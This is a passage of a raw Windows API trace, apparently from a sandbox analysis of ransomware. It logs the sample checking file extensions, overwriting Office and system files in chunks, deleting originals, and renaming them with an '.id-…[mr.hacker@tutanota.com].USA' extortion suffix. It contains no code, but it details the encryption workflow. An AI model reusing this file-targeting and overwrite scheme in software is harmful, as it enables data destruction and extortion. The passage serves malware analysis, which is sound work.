lpNewFilePointer=0x0) returned 1 [0053.523] WriteFile (in: hFile=0x174, lpBuffer=0x40170e8*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x306fc88, lpOverlapped=0x0 | out: lpBuffer=0x40170e8*, lpNumberOfBytesWritten=0x306fc88*=0x40000, lpOverlapped=0x0) returned 1 [0053.524] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x224df5c, lpNewFilePointer=0x0, dwMoveMethod=0x306fc7c | out: lpNewFilePointer=0x0) returned 1 [0053.524] WriteFile (in: hFile=0x174, lpBuffer=0x40170e8*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x306fc88, lpOverlapped=0x0 | out: lpBuffer=0x40170e8*, lpNumberOfBytesWritten=0x306fc88*=0x40000, lpOverlapped=0x0) returned 1 [0053.526] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x40170e8 | out: hHeap=0x5d0000) returned 1 [0053.526] CloseHandle (hObject=0x174) returned 1 [0053.526] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x2020) returned 1 [0053.526] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75 [0053.526] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75 [0053.526] lstrlenW (lpString=".doc") returned 4 [0053.526] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0053.526] lstrlenW (lpString=".docx") returned 5 [0053.526] lstrcmpiW (lpString1=".docx", lpString2="W.cab") returned -1 [0053.526] lstrlenW (lpString=".pdf") returned 4 [0053.526] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0053.526] lstrlenW (lpString=".xls") returned 4 [0053.526] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0053.526] lstrlenW (lpString=".xlsx") returned 5 [0053.526] lstrcmpiW (lpString1=".xlsx", lpString2="W.cab") returned -1 [0053.526] lstrlenW (lpString=".ppt") returned 4 [0053.527] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0053.527] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75 [0053.527] lstrlenW (lpString=".zip") returned 4 [0053.527] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0053.527] lstrlenW (lpString=".rar") returned 4 [0053.527] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0053.527] lstrlenW (lpString=".bz2") returned 4 [0053.527] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0053.527] lstrlenW (lpString=".7z") returned 3 [0053.527] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0053.527] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75 [0053.527] lstrlenW (lpString=".dbf") returned 4 [0053.527] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0053.527] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75 [0053.527] lstrlenW (lpString=".1cd") returned 4 [0053.527] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0053.527] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75 [0053.527] lstrlenW (lpString=".jpg") returned 4 [0053.527] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0053.527] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75 [0053.527] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75 [0053.527] lstrlenW (lpString=".doc") returned 4 [0053.527] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0053.527] lstrlenW (lpString=".docx") returned 5 [0053.527] lstrcmpiW (lpString1=".docx", lpString2="W.cab") returned -1 [0053.527] lstrlenW (lpString=".pdf") returned 4 [0053.527] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0053.527] lstrlenW (lpString=".xls") returned 4 [0053.527] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0053.527] lstrlenW (lpString=".xlsx") returned 5 [0053.527] lstrcmpiW (lpString1=".xlsx", lpString2="W.cab") returned -1 [0053.528] lstrlenW (lpString=".ppt") returned 4 [0053.528] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0053.528] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75 [0053.528] lstrlenW (lpString=".zip") returned 4 [0053.528] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0053.528] lstrlenW (lpString=".rar") returned 4 [0053.528] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0053.528] lstrlenW (lpString=".bz2") returned 4 [0053.528] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0053.528] lstrlenW (lpString=".7z") returned 3 [0053.528] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0053.528] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75 [0053.528] lstrlenW (lpString=".dbf") returned 4 [0053.528] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0053.528] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75 [0053.528] lstrlenW (lpString=".1cd") returned 4 [0053.528] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0053.528] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75 [0053.528] lstrlenW (lpString=".jpg") returned 4 [0053.528] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0053.528] lstrcmpiW (lpString1=".msi", lpString2=".USA") returned -1 [0053.528] lstrlenW (lpString="VisiorWW.msi") returned 12 [0053.528] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x168 [0053.844] GetFileSizeEx (in: hFile=0x168, lpFileSize=0x306ff1c | out: lpFileSize=0x306ff1c*=12060672) returned 1 [0053.844] CloseHandle (hObject=0x168) returned 1 [0053.844] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.msi")) returned 0x2020 [0053.844] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.msi.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0053.844] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.msi"), lpNewFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.msi.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 1 [0053.844] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.msi.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x168 [0053.844] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x306fc6c | out: lpNewFilePointer=0x0) returned 1 [0053.845] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x306fc2c | out: lpNewFilePointer=0x0) returned 1 [0053.845] ReadFile (in: hFile=0x168, lpBuffer=0x3ab0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x306fc38, lpOverlapped=0x0 | out: lpBuffer=0x3ab0058*, lpNumberOfBytesRead=0x306fc38*=0x40000, lpOverlapped=0x0) returned 1 [0053.849] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x3d5800, lpNewFilePointer=0x0, dwMoveMethod=0x306fc2c | out: lpNewFilePointer=0x0) returned 1 [0053.849] ReadFile (in: hFile=0x168, lpBuffer=0x3af0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x306fc38, lpOverlapped=0x0 | out: lpBuffer=0x3af0058*, lpNumberOfBytesRead=0x306fc38*=0x40000, lpOverlapped=0x0) returned 1 [0053.857] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x306fc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0053.857] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xb40800, lpNewFilePointer=0x0, dwMoveMethod=0x306fc2c | out: lpNewFilePointer=0x0) returned 1 [0053.857] ReadFile (in: hFile=0x168, lpBuffer=0x3b30058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x306fc38, lpOverlapped=0x0 | out: lpBuffer=0x3b30058*, lpNumberOfBytesRead=0x306fc38*=0x40000, lpOverlapped=0x0) returned 1 [0053.870] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x306fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.871] WriteFile (in: hFile=0x168, lpBuffer=0x3ab0020*, nNumberOfBytesToWrite=0xc0104, lpNumberOfBytesWritten=0x306fcb0, lpOverlapped=0x0 | out: lpBuffer=0x3ab0020*, lpNumberOfBytesWritten=0x306fcb0*=0xc0104, lpOverlapped=0x0) returned 1 [0053.959] SetEndOfFile (hFile=0x168) returned 1 [0053.959] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x40000) returned 0x40070e0 [0053.974] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x306fc7c | out: lpNewFilePointer=0x0) returned 1 [0053.974] WriteFile (in: hFile=0x168, lpBuffer=0x40070e0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x306fc88, lpOverlapped=0x0 | out: lpBuffer=0x40070e0*, lpNumberOfBytesWritten=0x306fc88*=0x40000, lpOverlapped=0x0) returned 1 [0053.976] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x3d5800, lpNewFilePointer=0x0, dwMoveMethod=0x306fc7c | out: lpNewFilePointer=0x0) returned 1 [0053.976] WriteFile (in: hFile=0x168, lpBuffer=0x40070e0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x306fc88, lpOverlapped=0x0 | out: lpBuffer=0x40070e0*, lpNumberOfBytesWritten=0x306fc88*=0x40000, lpOverlapped=0x0) returned 1 [0053.981] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xb40800, lpNewFilePointer=0x0, dwMoveMethod=0x306fc7c | out: lpNewFilePointer=0x0) returned 1 [0053.981] WriteFile (in: hFile=0x168, lpBuffer=0x40070e0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x306fc88, lpOverlapped=0x0 | out: lpBuffer=0x40070e0*, lpNumberOfBytesWritten=0x306fc88*=0x40000, lpOverlapped=0x0) returned 1 [0053.983] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x40070e0 | out: hHeap=0x5d0000) returned 1 [0053.983] CloseHandle (hObject=0x168) returned 1 [0053.983] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x2020) returned 1 [0053.984] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi") returned 75 [0053.984] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi") returned 75 [0053.984] lstrlenW (lpString=".doc") returned 4 [0053.984] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0053.984] lstrlenW (lpString=".docx") returned 5 [0053.984] lstrcmpiW (lpString1=".docx", lpString2="W.msi") returned -1 [0053.984] lstrlenW (lpString=".pdf") returned 4 [0053.984] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0053.984] lstrlenW (lpString=".xls") returned 4 [0053.984] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0053.984] lstrlenW (lpString=".xlsx") returned 5 [0053.984] lstrcmpiW (lpString1=".xlsx", lpString2="W.msi") returned -1 [0053.984] lstrlenW (lpString=".ppt") returned 4 [0053.984] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0053.984] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi") returned 75 [0053.984] lstrlenW (lpString=".zip") returned 4 [0053.984] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0053.984] lstrlenW (lpString=".rar") returned 4 [0053.984] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0053.984] lstrlenW (lpString=".bz2") returned 4 [0053.984] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0053.984] lstrlenW (lpString=".7z") returned 3 [0053.984] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0053.984] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi") returned 75 [0053.984] lstrlenW (lpString=".dbf") returned 4 [0053.984] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0053.984] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi") returned 75 [0053.984] lstrlenW (lpString=".1cd") returned 4 [0053.984] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0053.984] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi") returned 75 [0053.984] lstrlenW (lpString=".jpg") returned 4 [0053.984] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0053.985] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi") returned 75 [0053.985] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi") returned 75 [0053.985] lstrlenW (lpString=".doc") returned 4 [0053.985] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0053.985] lstrlenW (lpString=".docx") returned 5 [0053.985] lstrcmpiW (lpString1=".docx", lpString2="W.msi") returned -1 [0053.985] lstrlenW (lpString=".pdf") returned 4 [0053.985] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0053.985] lstrlenW (lpString=".xls") returned 4 [0053.985] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0053.985] lstrlenW (lpString=".xlsx") returned 5 [0053.985] lstrcmpiW (lpString1=".xlsx", lpString2="W.msi") returned -1 [0053.985] lstrlenW (lpString=".ppt") returned 4 [0053.985] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0053.985] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi") returned 75 [0053.985] lstrlenW (lpString=".zip") returned 4 [0053.985] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0053.985] lstrlenW (lpString=".rar") returned 4 [0053.985] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0053.985] lstrlenW (lpString=".bz2") returned 4 [0053.985] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0053.985] lstrlenW (lpString=".7z") returned 3 [0053.985] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0053.985] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi") returned 75 [0053.985] lstrlenW (lpString=".dbf") returned 4 [0053.985] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0053.985] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi") returned 75 [0053.985] lstrlenW (lpString=".1cd") returned 4 [0053.985] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0053.985] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi") returned 75 [0053.985] lstrlenW (lpString=".jpg") returned 4 [0053.985] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0053.986] lstrcmpiW (lpString1=".DLL", lpString2=".USA") returned -1 [0053.986] lstrlenW (lpString="EEINTL.DLL") returned 10 [0053.986] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\EEINTL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\1033\\eeintl.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x168 [0053.987] GetFileSizeEx (in: hFile=0x168, lpFileSize=0x306ff1c | out: lpFileSize=0x306ff1c*=64096) returned 1 [0053.987] CloseHandle (hObject=0x168) returned 1 [0053.987] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\EEINTL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\1033\\eeintl.dll")) returned 0x20 [0053.987] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\EEINTL.DLL.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\1033\\eeintl.dll.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0053.987] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\EEINTL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\1033\\eeintl.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x168 [0053.987] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x306fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.987] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x306fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.987] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\EEINTL.DLL.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\1033\\eeintl.dll.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0053.988] GetLastError () returned 0x0 [0053.988] ReadFile (in: hFile=0x168, lpBuffer=0x3ab0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x306fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ab0020*, lpNumberOfBytesRead=0x306fed4*=0xfa60, lpOverlapped=0x0) returned 1 [0053.994] WriteFile (in: hFile=0x218, lpBuffer=0x3ab0020*, nNumberOfBytesToWrite=0xfa70, lpNumberOfBytesWritten=0x306fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ab0020*, lpNumberOfBytesWritten=0x306fc9c*=0xfa70, lpOverlapped=0x0) returned 1 [0053.996] ReadFile (in: hFile=0x168, lpBuffer=0x3ab0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x306fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ab0020*, lpNumberOfBytesRead=0x306fed4*=0x0, lpOverlapped=0x0) returned 1 [0053.996] WriteFile (in: hFile=0x218, lpBuffer=0x3ab0020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0x306fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ab0020*, lpNumberOfBytesWritten=0x306fc9c*=0xe8, lpOverlapped=0x0) returned 1 [0053.996] SetEndOfFile (hFile=0x218) returned 1 [0053.996] CloseHandle (hObject=0x218) returned 1 [0053.997] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x306fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.997] SetEndOfFile (hFile=0x168) returned 1 [0053.998] CloseHandle (hObject=0x168) returned 1 [0053.998] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\EEINTL.DLL.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0053.998] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\EEINTL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\1033\\eeintl.dll")) returned 1 [0053.998] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\EEINTL.DLL") returned 71 [0053.998] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\EEINTL.DLL") returned 71 [0053.998] lstrlenW (lpString=".doc") returned 4 [0053.998] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0053.998] lstrlenW (lpString=".docx") returned 5 [0053.998] lstrcmpiW (lpString1=".docx", lpString2="L.DLL") returned -1 [0053.998] lstrlenW (lpString=".pdf") returned 4 [0053.998] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0053.998] lstrlenW (lpString=".xls") returned 4 [0053.998] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0053.998] lstrlenW (lpString=".xlsx") returned 5 [0053.998] lstrcmpiW (lpString1=".xlsx", lpString2="L.DLL") returned -1 [0053.998] lstrlenW (lpString=".ppt") returned 4 [0053.998] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0053.999] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\EEINTL.DLL") returned 71 [0053.999] lstrlenW (lpString=".zip") returned 4 [0053.999] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0053.999] lstrlenW (lpString=".rar") returned 4 [0053.999] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0053.999] lstrlenW (lpString=".bz2") returned 4 [0053.999] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0053.999] lstrlenW (lpString=".7z") returned 3 [0053.999] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0053.999] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\EEINTL.DLL") returned 71 [0053.999] lstrlenW (lpString=".dbf") returned 4 [0053.999] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0053.999] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\EEINTL.DLL") returned 71 [0053.999] lstrlenW (lpString=".1cd") returned 4 [0053.999] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0053.999] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\EEINTL.DLL") returned 71 [0053.999] lstrlenW (lpString=".jpg") returned 4 [0053.999] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0053.999] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\EEINTL.DLL") returned 71 [0053.999] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\EEINTL.DLL") returned 71 [0053.999] lstrlenW (lpString=".doc") returned 4 [0053.999] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0053.999] lstrlenW (lpString=".docx") returned 5 [0053.999] lstrcmpiW (lpString1=".docx", lpString2="L.DLL") returned -1 [0053.999] lstrlenW (lpString=".pdf") returned 4 [0053.999] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0053.999] lstrlenW (lpString=".xls") returned 4 [0053.999] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0053.999] lstrlenW (lpString=".xlsx") returned 5 [0053.999] lstrcmpiW (lpString1=".xlsx", lpString2="L.DLL") returned -1 [0053.999] lstrlenW (lpString=".ppt") returned 4 [0053.999] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0053.999] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\EEINTL.DLL") returned 71 [0054.000] lstrlenW (lpString=".zip") returned 4 [0054.000] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0054.000] lstrlenW (lpString=".rar") returned 4 [0054.000] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0054.000] lstrlenW (lpString=".bz2") returned 4 [0054.000] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0054.000] lstrlenW (lpString=".7z") returned 3 [0054.000] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0054.000] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\EEINTL.DLL") returned 71 [0054.000] lstrlenW (lpString=".dbf") returned 4 [0054.000] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0054.000] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\EEINTL.DLL") returned 71 [0054.000] lstrlenW (lpString=".1cd") returned 4 [0054.000] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0054.000] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\EEINTL.DLL") returned 71 [0054.000] lstrlenW (lpString=".jpg") returned 4 [0054.000] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0054.000] lstrcmpiW (lpString1=".CNT", lpString2=".USA") returned -1 [0054.000] lstrlenW (lpString="EQNEDT32.CNT") returned 12 [0054.000] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.CNT" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.cnt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f0 [0054.069] GetFileSizeEx (in: hFile=0x1f0, lpFileSize=0x306ff1c | out: lpFileSize=0x306ff1c*=2557) returned 1 [0054.069] CloseHandle (hObject=0x1f0) returned 1 [0054.069] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.CNT" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.cnt")) returned 0x20 [0054.069] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.CNT.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.cnt.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0054.069] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.CNT" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.cnt"), dwDesiredAccess=0xc0000000, 